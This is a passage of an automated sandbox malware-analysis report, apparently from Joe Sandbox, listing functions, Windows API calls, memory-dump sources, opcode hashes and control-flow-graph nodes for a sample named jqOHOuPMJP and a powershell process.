                                                                                                      • Instruction Fuzzy Hash: 011103B5800209DFDB50DF99D985BDEFBF4FB48320F14881AD958A7250C374AA44CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06EF0238 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 06EF33BD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1820252857.0000000006EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EF0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6ef0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePost
                                                                                                      • String ID:
                                                                                                      • API String ID: 410705778-0
                                                                                                      • Opcode ID: 7919d1317408ef9ec46f9edc3397bc202c471425f3cba1ee3dfd5090b1ddf8ef
                                                                                                      • Instruction ID: b693f66ef91daa52a5cab801bcf55d4ce88ccc1c6d693e383d76e3797a53ee17
                                                                                                      • Opcode Fuzzy Hash: 7919d1317408ef9ec46f9edc3397bc202c471425f3cba1ee3dfd5090b1ddf8ef
                                                                                                      • Instruction Fuzzy Hash: 2E11F2B5900348DFDB10DF9AD889BDEBBF8EB48320F10841AE959A7210C375A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067E3B58 Relevance: 1.5, APIs: 1, Instructions: 47threadwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 067E4B08
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessagePostThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1836367815-0
                                                                                                      • Opcode ID: 3ceb6639c5edabc2edb49ce508523aacaf34e9b6212631eb16494ca99dfc03cd
                                                                                                      • Instruction ID: 9645bd54df8dcea2d6ba805b8204827ca8402ba181e5203d855a24c104acc546
                                                                                                      • Opcode Fuzzy Hash: 3ceb6639c5edabc2edb49ce508523aacaf34e9b6212631eb16494ca99dfc03cd
                                                                                                      • Instruction Fuzzy Hash: 50110470900248DEDB10CF89D849BDEBFF4EB08324F10881AD555A7244C375A544CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0625C34A Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000020A,?,?,?,?,?,?,0625410A,?,00000000,?), ref: 0625C3AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 3850602802-0
                                                                                                      • Opcode ID: f147e9cc283f09fcc5b8c75473f0c810c188dd0385bb47c7ab954e60091ad063
                                                                                                      • Instruction ID: 9a7b086bcffb580befae29fe4fd259948c15d09d6dacac3cade6a7061b501774
                                                                                                      • Opcode Fuzzy Hash: f147e9cc283f09fcc5b8c75473f0c810c188dd0385bb47c7ab954e60091ad063
                                                                                                      • Instruction Fuzzy Hash: A01103B5800309DFDB50DF99D985BDEBBF8EB48310F10841AE958A7610C374A984CFA1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067E5A60 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 067E6DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 584c82f153e2ebf482d9627f864950d3a9730cd4fc0b36310949e869e56585b5
                                                                                                      • Instruction ID: cef31b232876baab642992f8d972ded527e799e1491b71f40cd86dfddaa13b44
                                                                                                      • Opcode Fuzzy Hash: 584c82f153e2ebf482d9627f864950d3a9730cd4fc0b36310949e869e56585b5
                                                                                                      • Instruction Fuzzy Hash: 271133B48003088FDB20DF9AD544BDEBBF4EB48320F208459D518A7210D374A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067E6D90 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • OleInitialize.OLE32(00000000), ref: 067E6DED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Initialize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2538663250-0
                                                                                                      • Opcode ID: 88ba94c149b13ea820d674745cfca25bf1cd9a40fa97cc51a69cf911c79a8f4e
                                                                                                      • Instruction ID: e1c470e836bb218cd9dcf9b205a3644aafc194af9d8436e488dc5f811fd12d43
                                                                                                      • Opcode Fuzzy Hash: 88ba94c149b13ea820d674745cfca25bf1cd9a40fa97cc51a69cf911c79a8f4e
                                                                                                      • Instruction Fuzzy Hash: 441123B5C00248CFDB60DFAAD449BDEBBF4EB48324F20845AD558A7210D378AA44CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067EFA78 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatchMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 2061451462-0
                                                                                                      • Opcode ID: 2dd9c5a21853c392ce1902ce90564902bec184d3a9ac2f0735f66cdb5cf50879
                                                                                                      • Instruction ID: 0f3bdf23c7f38f9a267e6f7bddf968b2dfaf3fe8a1ae591666ca6a62b80dff28
                                                                                                      • Opcode Fuzzy Hash: 2dd9c5a21853c392ce1902ce90564902bec184d3a9ac2f0735f66cdb5cf50879
                                                                                                      • Instruction Fuzzy Hash: A211EDB1D002498FDB24DF9AD844B9EFBF4AB49324F10856AD858A7610C379A944CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 067EFA80 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819805628.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_67e0000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatchMessage
                                                                                                      • String ID:
                                                                                                      • API String ID: 2061451462-0
                                                                                                      • Opcode ID: 2ad37bc1ffa0b730d9372d636398f432815b47c5a34aaba4e972837e4f82d9fa
                                                                                                      • Instruction ID: deb5710eef12fb3d56bf1f98beccc37fb3147329c2d259025754116131366ff3
                                                                                                      • Opcode Fuzzy Hash: 2ad37bc1ffa0b730d9372d636398f432815b47c5a34aaba4e972837e4f82d9fa
                                                                                                      • Instruction Fuzzy Hash: 93110DB1C00249CFCB10DF9AD844BDEFBF4EB48324F10842AD858A7210C378AA44CFA5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 029DD01C Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 26a679efcab4c2707ec0280bfad58fdb49b7990d15fdccf58d6119f758b1698d
                                                                                                      • Instruction ID: 57f87f2920259b094b273a99c6d4cb151d93c872caa578e613d477cad0d94e4a
                                                                                                      • Opcode Fuzzy Hash: 26a679efcab4c2707ec0280bfad58fdb49b7990d15fdccf58d6119f758b1698d
                                                                                                      • Instruction Fuzzy Hash: F321F272604200DFDB14DF24D984B26BBA9EBC8314F64C969D80A4B296C33AD447DA71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 029DD2BC Relevance: .1, Instructions: 72COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 774818c41e20079d1e0f120d896ca367bb0eb2cb3f2a6a6db7fa6328895d9e73
                                                                                                      • Instruction ID: d6addad9ed174f56b392c93a2086a5e34414e398e748951e7d8fb3419336afba
                                                                                                      • Opcode Fuzzy Hash: 774818c41e20079d1e0f120d896ca367bb0eb2cb3f2a6a6db7fa6328895d9e73
                                                                                                      • Instruction Fuzzy Hash: 01212772504244DFDB04DF14DAC4B2AFBA9FB84328F24CA69D9494B245C33AD446DAB1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 029DD005 Relevance: .1, Instructions: 60COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 80b7c211c4424d45eaba5c5bec5d6ec8399e6097d0028a3e39a758bc966b8be8
                                                                                                      • Instruction ID: 8daab08cc15df9750ee6921eddc487eb7d39ef775cb46a14a3b4c34b1ea1a5b7
                                                                                                      • Opcode Fuzzy Hash: 80b7c211c4424d45eaba5c5bec5d6ec8399e6097d0028a3e39a758bc966b8be8
                                                                                                      • Instruction Fuzzy Hash: 3A21C6755093C08FCB12CF24D994715BF71EB85214F28C5DAD8498F697C33AD40ACB62
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 029DD2B7 Relevance: .1, Instructions: 53COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798811759.00000000029DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029DD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29dd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                      • Instruction ID: 82a6c0e8a3d85c0c2006be61e781f413cba478a9622eba76e7dad5cc49b745a3
                                                                                                      • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                      • Instruction Fuzzy Hash: 5C11C176504280CFDB16CF14D5C4B1AFF71FB84328F28C6AAD8494B656C33AD40ADBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 029CD68D Relevance: .0, Instructions: 45COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798595421.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29cd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: ce2752523331bfd8ea7a8fda5ea171b6a30bb18fb71ef7b64f49ccdd47e3d256
                                                                                                      • Instruction ID: 8ab95931298d9a0ee5816c47124928773592f846b56760c8545c4b4e97807c76
                                                                                                      • Opcode Fuzzy Hash: ce2752523331bfd8ea7a8fda5ea171b6a30bb18fb71ef7b64f49ccdd47e3d256
                                                                                                      • Instruction Fuzzy Hash: 1F01A2711097409AE710AA29DA84767BF9CEF45364F28C83EED0D4A286C7799840CAB3
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 029CD68C Relevance: .0, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1798595421.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_29cd000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 3d638616aa3fa68596610704685e8e9f3f70af53f7601138eb714505a46fa4b1
                                                                                                      • Instruction ID: 2ce5796571c230f9fd4eea4d276724ce064227e9f9b2d3edb806cbc2dbd28c26
                                                                                                      • Opcode Fuzzy Hash: 3d638616aa3fa68596610704685e8e9f3f70af53f7601138eb714505a46fa4b1
                                                                                                      • Instruction Fuzzy Hash: 7AF062714043849AE7109A1AC9C4B62FFACEB45664F28C45AED4C4A286C379A844CA71
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 06250040 Relevance: .3, Instructions: 315COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e75130591e60485901df8a6a731a89220f56339dd421b06f4ed423fc41bccbb3
                                                                                                      • Instruction ID: ef91ed152a0bab77c53a09a3e5bf11d04e5dbc4eb4a8a4a7d4b0f67e6c67ddba
                                                                                                      • Opcode Fuzzy Hash: e75130591e60485901df8a6a731a89220f56339dd421b06f4ed423fc41bccbb3
                                                                                                      • Instruction Fuzzy Hash: 6E1282B0C81745CADB30CF65E95C98D3BA1BB4539CBD08A09D2616F3E1DBB811AACF44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 02B8E00C Relevance: .3, Instructions: 264COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1816395187.0000000002B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B80000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_2b80000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: e92215fb13a8f841e86721af86f4a8e7a22345e3c8ccbcfc5c6a19d1974df465
                                                                                                      • Instruction ID: 4ad2fac9b40574563483030b0d068ebeae3f6f77bf82cf9e57f92926dab10163
                                                                                                      • Opcode Fuzzy Hash: e92215fb13a8f841e86721af86f4a8e7a22345e3c8ccbcfc5c6a19d1974df465
                                                                                                      • Instruction Fuzzy Hash: 40A15D32E00219CFCF15EFB4C8805AEBBB2FF85304B5545AAE909AB265DB31E955CF50
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 06250006 Relevance: .2, Instructions: 238COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1819348559.0000000006250000.00000040.00000800.00020000.00000000.sdmp, Offset: 06250000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6250000_jqOHOuPMJP.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 99d1908d430076de95981dea8079c87fda677737f9faeafb85acd84d428d9baf
                                                                                                      • Instruction ID: 036154ce6e338975671e7bccd856cc899c2e195141ff11950b0adac5d5857e85
                                                                                                      • Opcode Fuzzy Hash: 99d1908d430076de95981dea8079c87fda677737f9faeafb85acd84d428d9baf
                                                                                                      • Instruction Fuzzy Hash: E5C129B0C80745CBDB21CF24E85858D7BB1BB8539CF958B09D2616F2E1DBB814AACF44
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:6.8%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:3
                                                                                                      Total number of Limit Nodes:0
                                                                                                      execution_graph 22253 8806428 22254 880646b SetThreadToken 22253->22254 22255 8806499 22254->22255

                                                                                                      Executed Functions

                                                                                                      Function 04F5B471 Relevance: .3, Instructions: 264COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 860 4f5b471-4f5b4a9 862 4f5b4ae-4f5b7e9 call 4f5acbc 860->862 863 4f5b4ab 860->863 924 4f5b7ee-4f5b7f5 862->924 863->862
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 6fe319d2fcf327e49e18bc7f052a5162122622a2a1672491e39b0aa3b18540eb
                                                                                                      • Instruction ID: e3ff4759f5c257da257d0e2583039f9170501abaf85c0836fd77042cb581eab2
                                                                                                      • Opcode Fuzzy Hash: 6fe319d2fcf327e49e18bc7f052a5162122622a2a1672491e39b0aa3b18540eb
                                                                                                      • Instruction Fuzzy Hash: 74914271A006159FEF1AEFA4C4145AEB7E2EFC4604B018A1DD50AAB350DF74AD0B8BD6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 04F5B490 Relevance: .3, Instructions: 252COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 925 4f5b490-4f5b4a9 926 4f5b4ae-4f5b7e9 call 4f5acbc 925->926 927 4f5b4ab 925->927 988 4f5b7ee-4f5b7f5 926->988 927->926
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1712084470.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_4f50000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: fe54a332e5aec54a49425568145a96d1868c6fa40d6bb1c5d499976b031329ae
                                                                                                      • Instruction ID: 2107ff7322a2bef6974153b566d8a34878b093a45099f0f709beee8e9b4a216b
                                                                                                      • Opcode Fuzzy Hash: fe54a332e5aec54a49425568145a96d1868c6fa40d6bb1c5d499976b031329ae
                                                                                                      • Instruction Fuzzy Hash: 99915171B006159BEF1AEFA484145AFB7E2EFC4604B018A1DD50AAB350DF74AD0B8BD6
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07902308 Relevance: 13.2, Strings: 10, Instructions: 654COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$JJl$JJl$JJl$JJl$JJl$JJl$rIl$rIl
                                                                                                      • API String ID: 0-2055014725
                                                                                                      • Opcode ID: 000d2042e7d3015d3e718eaf2c47e32bd2b4f3c12e29a706e3a1179e940a89c0
                                                                                                      • Instruction ID: a8ba998d3edde4ac25c15d0a914c625ac891e10a7bd8f6901f631f76f98b87de
                                                                                                      • Opcode Fuzzy Hash: 000d2042e7d3015d3e718eaf2c47e32bd2b4f3c12e29a706e3a1179e940a89c0
                                                                                                      • Instruction Fuzzy Hash: 32224BB5B20206CFCB15CF688408AAABBE9BF89318F14847AD915CB3D5DB31D945C7E1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 07903CE8 Relevance: 5.6, Strings: 4, Instructions: 590COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 209 7903ce8-7903d0d 210 7903f00-7903f0a 209->210 211 7903d13-7903d18 209->211 221 7903f13-7903f4a 210->221 222 7903f0c-7903f11 210->222 212 7903d30-7903d34 211->212 213 7903d1a-7903d20 211->213 216 7903eb0-7903eba 212->216 217 7903d3a-7903d3c 212->217 214 7903d22 213->214 215 7903d24-7903d2e 213->215 214->212 215->212 223 7903ec8-7903ece 216->223 224 7903ebc-7903ec5 216->224 219 7903d4c 217->219 220 7903d3e-7903d4a 217->220 226 7903d4e-7903d50 219->226 220->226 227 7903f50-7903f55 221->227 228 79040ce-79040d6 221->228 222->221 229 7903ed0-7903ed2 223->229 230 7903ed4-7903ee0 223->230 226->216 232 7903d56-7903d75 226->232 233 7903f57-7903f5d 227->233 234 7903f6d-7903f71 227->234 241 79040d8-79040de 228->241 242 79040df-7904112 228->242 231 7903ee2-7903efd 229->231 230->231 261 7903d85 232->261 262 7903d77-7903d83 232->262 239 7903f61-7903f6b 233->239 240 7903f5f 233->240 237 7904080-790408a 234->237 238 7903f77-7903f79 234->238 244 7904097-790409d 237->244 245 790408c-7904094 237->245 246 7903f89 238->246 247 7903f7b-7903f87 238->247 239->234 240->234 241->242 250 7904228-7904232 242->250 251 7904118-790411d 242->251 253 79040a3-79040af 244->253 254 790409f-79040a1 244->254 252 7903f8b-7903f8d 246->252 247->252 274 7904234-790423a 250->274 275 790423b-790424c 250->275 256 7904135-7904139 251->256 257 790411f-7904125 251->257 252->237 259 7903f93-7903fb2 252->259 260 79040b1-79040cb 253->260 254->260 266 79041da 256->266 267 790413f-7904141 256->267 263 7904127 257->263 264 7904129-7904133 257->264 298 7903fc2 259->298 299 7903fb4-7903fc0 259->299 269 7903d87-7903d89 261->269 262->269 263->256 264->256 276 79041db-79041e4 266->276 271 7904151 267->271 272 7904143-790414f 267->272 269->216 280 7903d8f-7903d96 269->280 282 7904153-7904155 271->282 272->282 274->275 275->276 277 790424e 275->277 278 79041f1-79041f7 276->278 279 79041e6-79041ee 276->279 284 7904250-7904255 277->284 285 7904257-790425d 277->285 286 79041f9-79041fb 278->286 287 79041fd-7904209 278->287 280->210 288 7903d9c-7903da1 280->288 282->266 283 790415b-790415d 282->283 291 7904177-790417e 283->291 292 790415f-7904165 283->292 284->285 293 790428b-7904295 285->293 294 790425f-7904281 285->294 295 790420b-7904225 286->295 287->295 296 7903da3-7903da9 288->296 297 7903db9-7903dc8 288->297 303 7904180-7904186 291->303 304 7904196-79041d7 291->304 300 7904167 292->300 301 7904169-7904175 292->301 307 7904297-790429c 293->307 308 790429f-79042a5 293->308 329 7904283-7904288 294->329 330 79042d5-79042fe 294->330 305 7903dab 296->305 306 7903dad-7903db7 296->306 297->216 321 7903dce-7903dec 297->321 309 7903fc4-7903fc6 298->309 299->309 300->291 301->291 311 7904188 303->311 312 790418a-7904194 303->312 305->297 306->297 314 79042a7-79042a9 308->314 315 79042ab-79042b7 308->315 309->237 317 7903fcc-7904003 309->317 311->304 312->304 322 79042b9-79042d2 314->322 315->322 338 7904005-790400b 317->338 339 790401d-7904024 317->339 321->216 336 7903df2-7903e17 321->336 344 7904300-7904326 330->344 345 790432d-790435c 330->345 336->216 358 7903e1d-7903e24 336->358 342 790400d 338->342 343 790400f-790401b 338->343 346 7904026-790402c 339->346 347 790403c-790407d 339->347 342->339 343->339 344->345 356 7904395-790439f 345->356 357 790435e-790437b 345->357 349 7904030-790403a 346->349 350 790402e 346->350 349->347 350->347 361 79043a1-79043a5 356->361 362 79043a8-79043ae 356->362 369 79043e5-79043ea 357->369 370 790437d-790438f 357->370 359 7903e26-7903e41 358->359 360 7903e6a-7903e9d 358->360 372 7903e43-7903e49 359->372 373 7903e5b-7903e5f 359->373 384 7903ea4-7903ead 360->384 365 79043b0-79043b2 362->365 366 79043b4-79043c0 362->366 367 79043c2-79043e2 365->367 366->367 369->370 370->356 378 7903e4b 372->378 379 7903e4d-7903e59 372->379 380 7903e66-7903e68 373->380 378->373 379->373 380->384
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.1718058242.0000000007900000.00000040.00000800.00020000.00000000.sdmp, Offset: 07900000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_7900000_powershell.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                      • API String ID: 0-1420252700
                                                                                                      • Opcode ID: 6fb78a6bcdc3ebcdb98e2a7c448ab2dc49f06c7e94624bfbcee283463035d4a6
                                                                                                      • Instruction ID: 52377fae559fee6a42c8099bfcae4a34058f03c2416f93fabc89079ab888a19a
                                                                                                      • Opcode Fuzzy Hash: 6fb78a6bcdc3ebcdb98e2a7c448ab2dc49f06c7e94624bfbcee283463035d4a6
                                                                                                      • Instruction Fuzzy Hash: 921258B17202558FCB158B788811A6ABFBAAFD6358F14847AD605CF2A1DB31CC45C7E2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 079017B8 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
